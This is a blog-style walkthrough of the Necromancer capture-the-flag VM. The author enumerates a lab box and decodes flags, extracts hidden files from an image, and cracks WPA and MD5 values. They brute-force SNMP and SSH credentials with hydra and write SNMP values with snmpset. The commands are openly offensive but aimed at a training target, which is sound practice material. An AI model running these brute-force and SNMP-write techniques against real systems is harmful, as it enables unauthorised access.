Necromancer Walkthrough
Next on the list of walkthroughs to be transcribed to my new domain is Necromancer. This is a good multi-layered CTF which taught me a lot when I did it back in mid-2016. What things appear to be, can often be a trick!
Rather than simply copy my previous writeup, I decided to reroot the box afresh as I couldn’t remember anything. It was pretty heartening to see my improved methodology and TTPs work well.
Standard Nmap enumeration (not paying attention to opsec here, its a boot2root!)
Initial nmap showed the top 2500 ports were filtered, so let’s add -p-.
nmap -T4 -sV 10.1.1.46
Still nothing. By this time my UDP scan had finished.
nmap -T4 -sU 10.1.1.46 --max-retries 3 --max-rtt-timeout 150ms
Hmmm, p666 is open which Nmap refers to as Doom. What can we enumerate from it?
root@kali:~# nc -nvvvu 10.1.1.46 666 (UNKNOWN) [10.1.1.46] 666 (?) open hello You gasp for air! Time is running out!
Couldn’t seem to get anything else out of the box. Luckily, I’d developed a TTP of starting a packet capture as soon as I booted the machine so decided to have a peruse of that.
I noticed the box was ARPing like mad across the subnet, but also it was trying to connect to my box on p4444. In the screenshots I have highlighted the initial TCP connection but also my kali machine dropping it with a TCP RST.
So I could find out what was being sent, I set up a netcat listener.
root@kali:~# nc -lnvvvp 4444 listening on [any] 4444 ...
I received a connect shortly with the following string.
root@kali:~# nc -lnvvvp 4444 listening on [any] 4444 ... connect to [10.1.1.128] from (UNKNOWN) [10.1.1.46] 40914 <massive base64 string> sent 0, rcvd 1424
Obviously some form of encoding, looks a bit like base64. Let’s decode it.
cat necromancer.txt | base64 -d
Welcome!
You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"
So then, let’s look at UDP p666! I pasted the flag1 string into netcat but received an error.
root@kali:~# nc -nvvu 10.1.1.46 666 (UNKNOWN) [10.1.1.46] 666 (?) open e6078b9b1aac915d11b9fd59791030bf Chant had no affect! Try in a different tongue! Chant had no affect! Try in a different tongue!
Not quite there yet then. Different tongue suggests different format. Hash-identifer to the rescue! Reported as md5 hash, lets get the plaintext.
HASH: e6078b9b1aac915d11b9fd59791030bf Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Hashkiller.co.uk reports the hash as opensesame. Hurrah! Let’s get back to UDP p666.
root@kali:~# nc -nvvu 10.1.1.46 666 (UNKNOWN) [10.1.1.46] 666 (?) open opensesame
A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.
666 is closed.
Flag2 looks like it could be a md5 too, lets check!
Hashkiller reports the plaintext as 1033750779, which doesn’t look promising. The narrative makes mention of numeral 80 however…. Webserver?
root@kali:~# nmap -T4 -p80 10.1.1.46 Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-03 13:16 BST Nmap scan report for 10.1.1.46 Host is up (0.00043s latency). PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:22:27:37 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Manual browsing reveals a plaintext HTML site. Nothing interesting in the source file. I fired up dirb and nikto in the background whilst I had a think.
Whilst it was running I grabbed the embedded image to see if there was any interesting exif data or similar. I cycled through various exif tools and the strings / file command with limited joy. I thought I was stuck so restarted my enumeration, but still ran into the same block.
Googling revealed binwalk, which when ran said there was a zip archive in the jpeg too.
root@kali:~/tools/Image-ExifTool-10.60# binwalk pileoffeathers.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, EXIF standard 12 0xC TIFF image data, little-endian offset of first image directory: 8 270 0x10E Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http 36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt 37267 0x9193 End of Zip archive
Having messed about with various unzipping utilities that wouldn’t run against a jpeg, I eventually realised that binwalk can also extract known file types. Doh.
root@kali:/Necromancer# binwalk -e pileoffeathers.jpg
ls
root@kali:/Necromancer# ls
necromancer.txt pileoffeathers.jpg _pileoffeathers.jpg.extracted
cd _pileoffeathers.jpg.extracted
ls
root@kali:/Necromancer/_pileoffeathers.jpg.extracted# ls
9082.zip feathers.txt
Catting feathers.txt reveals another base64 string, which decoded becomes:
root@kali/Necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm
Manual browsing to //amagicbridgeappearsatthechasm reveals a new page.
It waffles on about some magic but says that I need a special item to protect me. At this point I’m pretty damned stumped and start googling for magic items!
Note to all CTF authors: It’s meant to be a technical challenge, not a challenge to follow your convoluted thought process.
I took a hint and looked at another walkthrough that mentioned I needed a list of terms related to the occult / magic. He used a bash script to wget the page then sort through it. I decided to use the slightly more elegant cEwl.
cewl https://en.wikipedia.org/wiki/List_of_occult_terms -m4 -d0 -w necromancer.txt
I tried feeding this to dirb but got nowhere.
dirb http://10.1.1.46 necromancer.txt
The next day I tried again, except putting the full current path into dirb…..
dirb http://10.1.1.46/amagicbridgeappearsatthechasm necromancer.txt
Bingo. /talisman. Obscure and you could spent months working at it without realising you needed a wordlist made from the internet. Author fail.
I visited the URL amagicbridgeappearsatthechasm/talisman and received a file download. I had a look at it using file and strings, it’s definitely a binary!
Now I started to get a bit confused, my experience of linux binaries is limited to Crossfire BoF and similar. I tried opening it in various editors and programs. I did also learn about readelf though, so time wasn’t wasted.
Eventually I thought I’d try and connect a debugger to it and that led to three evenings of Googling on the best options.
I decided upon gdb and resumed Googling and familiarising myself with the help file.
A few tutorials suggested looking into the functions within a binary. I ran info functions after coming across this link.
(gdb) info functions All defined functions: Non-debugging symbols: 0x080482d0 _init 0x08048310 printf@plt 0x08048320 __libc_start_main@plt 0x08048330 __isoc99_scanf@plt 0x08048350 _start 0x08048380 __x86.get_pc_thunk.bx 0x08048390 deregister_tm_clones 0x080483c0 register_tm_clones 0x08048400 __do_global_dtors_aux 0x08048420 frame_dummy 0x0804844b unhide 0x0804849d hide 0x080484f4 myPrintf 0x08048529 wearTalisman 0x08048a13 main 0x08048a37 chantToBreakSpell 0x08049530 __libc_csu_init 0x08049590 __libc_csu_fini 0x08049594 _fini
Slightly blindly, and without 100% understanding what I was doing, I set a breakpoint at wearTalisman. My reasoning was that that seemed to be the bit that kicked me out of the program, so if I stop there and see what is going on, I can make a better informed decision. At this point I was still stuck in the ‘find JMP ESP, insert shellcode’ mentality.
I thought back to the function list. I’d put the breakpoint on wearTalisman and had the chance to issue commands using gdb. I tried jumping to the other function.
(gdb) jmp chantToBreakSpell
Undefined command: "jmp". Try "help".
(gdb) jump chantToBreakSpell
Line 0 is not in `__isoc99_scanf'. Jump anyway? (y or n) y
Continuing at 0x8048a3b.
Do you want to wear the talisman? !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Lovely! Lets get that next step cracked! Chanting the flag directly at UDP p31337 gave me the same message as previously, about using a different tongue.
Hashkiller.co.uk reveals the plaintext: blackmagic
Chanting to UDP p31337 with blackmagic reveals a wall of text.
root@kali:/Necromancer: nc -nvvu 10.1.1.46 31337
(UNKNOWN) [10.1.1.46] 31337 (?) open
blackmagic
As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until.... silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.
/thenecromancerwillabsorbyoursoul
flag5{0766c36577af58e15545f099a3b15e60}
Manual browsing to the path (from the root this time, not from the existing path of amagicbridgeappearsatthechasm/) gives us a new page. URL: http://10.1.1.46/thenecromancerwillabsorbyoursoul/ Flag6 is on here too: b1c3ed8f1db4258e4dcb0ce565f6dc03
There is a hyperlink to a bin file which I downloaded. I also downloaded the necromancer image and ran exiftool on it. There was lots of output but this stood out:
Thumbnail Image : (Binary data 4505 bytes, use -b option to extract)
I tried to grab the binary data but didn’t have any luck at first. I shelved it and focused on the binary file. The file command revealed it to be bzip2 compressed data.
I tried to decompress it with
tar -xvf necromancer
but received an error about changing ownership to 0 (root). I reckon this is something to do with root squashing as my files are held in an NFS mount. I managed to get hold of the contents which appeared to be a necromancer.cap file. Quick Google revealed this to be similar to a pcap from Wireshark. I imported it into Wireshark and began to read through it. Lots of 802.11 traffic.
Aircrack has an option to import cap files. I tried using my previous cEwl wordlist.
aircrack-ng necromancer.cap -w necromancer.txt
But received no hits. I fired up the rockyou list and got a hit with death2all.
Aircrack-ng 1.2 rc4 [00:00:10] 16104/9822768 keys tested (1492.56 k/s) Time left: 1 hour, 49 minutes, 32 seconds 0.16% KEY FOUND! [ death2all ] Master Key : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7 Transient Key : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C 56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3 C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92 3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D EAPOL HMAC : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E
I was a bit stuck, as I couldn’t seem to see the ‘finish’. I clicked about whilst working out what to do, and noticed I’d missed something on:
http://10.1.1.46/thenecromancerwillabsorbyoursoul/.
There was a reference to u161 – SNMP. I fired up my SNMP enumeration tools to have a look. I couldn’t connect with public, private or necromancer as the community strings.
I thought about bruteforcing it with rockyou but realised it would take forever. I tried with my custom wordlist from before (I had manually added necromancer, talisman and death2all to it).
hydra -P necromancerwords.txt -t 50 -w 3 -f -v 10.1.1.46 snmp
I received a hit, with death2all. Now I will try to connect and enumerate fully.
snmp-check 10.1.1.46 -c death2all snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2all' [*] System information: Host IP address : 10.1.1.46 Hostname : Fear the Necromancer! Description : You stand in front of a door. Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked. Location : Locked - death2allrw! Uptime snmp : - Uptime system : - System date : -
I read up on the structure of OIDs and MIBs in SNMP. MIBs = hierarchical info types. OIDs = individual fields of info within that hierarchy.
I needed to find the ‘location field’ and it’s OID. snmp-walk provided a bit more info.
snmpwalk -c death2all -v1 10.1.1.46 iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door." iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked." iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!" iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
I noted the death2allrw string. Connecting with:
snmpwalk -c death2allrw -v1 10.1.1.46
This gave me more than enough information! I started to think about writing to snmp strings if I have rw access. I needed to tighten up my syntax now I knew the exact string I needed to write to.
snmpwalk -c death2allrw -v1 10.1.1.46 |grep Locked iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked." iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
I made sure I definitely had read/write access to the strings before I disappeared down a rabbit hole. The snmp-check script has a -w option that checks that permission in detail.
snmp-check -w 10.1.1.46 -c death2allrw snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2allrw' [+] Write access check enabled [*] Write access permitted!
Between the two snmp tools I knew I had write access, and the string to write to (iso.3.6.1.2.1.1.6.0).
I ran snmpset.
snmpset -v1 -c death2allrw 10.1.1.46 iso.3.6.1.2.1.1.6.0 s Unlocked
Check against with snmp-check.
snmp-check 10.1.1.46 -c death2all
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2all'
[*] System information:
Host IP address : 10.1.1.46
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is unlocked! You may now enter the Necromancer's lair!
Location : flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22
Uptime snmp : -
Uptime system : -
System date : -
The reason I couldn’t see the finish was that I hadn’t finished! Another flag! Took me a second to notice that TCP p22 reference too (u161 stands up, but I hardly ever see tXYZ written down’.
Nmap shows p22 open now. md5 of Flag7 resolved to demonslayer which I try as creds. I try my old wordlist, username as pw and all the basics. No joy. I _hate_ bruteforcing as it is noisy and gets you IP banned. However, I couldn’t think of much else.
Note: -P to specify a password file and -l to specify one user rather than a list of user names.
hydra -P /usr/share/seclists/Passwords/10k_most_common.txt -l demonslayer 10.1.1.46 ssh Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-03 17:11:18 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~9 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 10.1.1.46 login: demonslayer password: 12345678
Lovely. Let’s get logged in.
I find myself in the homedir. Linuxprivescchecker.py is already loaded and Flag8.txt makes reference to the Necromancer attacking me on UDP p777. I started a listener just in case I had something to catch. (nc -nvvlup 777)
I tried an inbound connection to the box on UDP p777 too. I left it for half an hour in case it was a timed event. Nothing had happened. I remembered on my OSCP labs that sometimes what you can see from the box itself, is different to what you can see from outside the box.
I began to enumerate what tools where on the box. No nmap, nano (annoying to bash script multi-line without it). Vi was installed but I valued my sanity too much. NetCat was installed but it didn’t support the -z port scan option (course it didn’t!)
Again, take a break and think. May as well try UDP p777 directly rather than scanning…..
nc -nvvvvu 127.0.0.1 777 Connection to 127.0.0.1 777 port [udp/*] succeeded! ** You only have 3 hitpoints left! ** Defend yourself from the Necromancer's Spells! Where do the Black Robes practice magic of the Greater Path? ** You only have 2 hitpoints left! ** Defend yourself from the Necromancer's Spells! Where do the Black Robes practice magic of the Greater Path? ** You only have 1 hitpoints left! ** Defend yourself from the Necromancer's Spells! Where do the Black Robes practice magic of the Greater Path? ** You only have 0 hitpoints left! ** Defend yourself from the Necromancer's Spells! Where do the Black Robes practice magic of the Greater Path? !!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!
Slightly harsh. I didn’t even type anything! I ssh back in and try again. Nothing. Looks like the VM has crashed, upon restarting it I need to redo my previous exploitation steps! Pain!
A few restarts of the VM and choice words later and I’m back at the Necromancer Battle.
I pwn him using the answers to the questions – happily Google’d.
- Kelewan
- Mephistopheles
- Hedge
Flags 8, 9 and 10 are revealed in the battle.
A small vile (vial?!) is apparently at my feet. It takes me a while to work out I should try and find it rather than waiting for something to happen! A dot file entitled .smallvile is found in the current directory.
Reading the file mentions a great power. I make a brew and I am reminded of the message of Sudo – ‘With great power comes great responsibility.’
cat .smallvile You pick up the small vile. Inside of it you can see a green liquid. Opening the vile releases a pleasant odour into the air. You drink the elixir and feel a great power within your veins!
I try to list out my sudo permissions with sudo -l
sudo -l Matching Defaults entries for demonslayer on thenecromancer: env_keep+=”FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK” User demonslayer may run the following commands on thenecromancer: (ALL) NOPASSWD: /bin/cat /root/flag11.txt
So I can run the cat command against a flag file hidden in root’s directory. Pretty simple.
sudo cat /root/flag11.txt
Another VM completed! Yet another md5 which becomes…… hackergod!